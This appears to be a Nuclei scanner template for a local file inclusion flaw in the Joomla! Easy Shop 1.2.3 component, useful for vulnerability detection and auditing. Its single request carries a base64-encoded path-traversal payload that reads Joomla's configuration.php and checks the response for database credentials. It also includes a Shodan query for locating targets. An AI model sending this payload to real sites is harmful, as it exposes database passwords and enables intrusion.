id: joomla-easyshop-lfi

info:
  name: Joomla! Component Easy Shop 1.2.3 - Local File Inclusion
  author: ritikchaddha
  severity: high
  description: |
    The Joomla! component Easy Shop version 1.2.3 is vulnerable to Local File Inclusion (LFI) attacks.
  reference:
    - https://blog.csdn.net/weixin_42628854/article/details/136036109
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Joomla"
  tags: cnvd,cnvd2023,file-upload

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA="

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "<?php", "class JConfig {")'
          - 'contains_any(body, "$user", "$password", "$dbtype")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100f7d37b910794026d389fc6e69702589443195bd0f0f61df12d41ac5d92de9182022100ec309484364d3b811be8a3386c11836b27a86ed388de5579e3b660a2e4b5b864:922c64590222798bb761d5b6d8e72950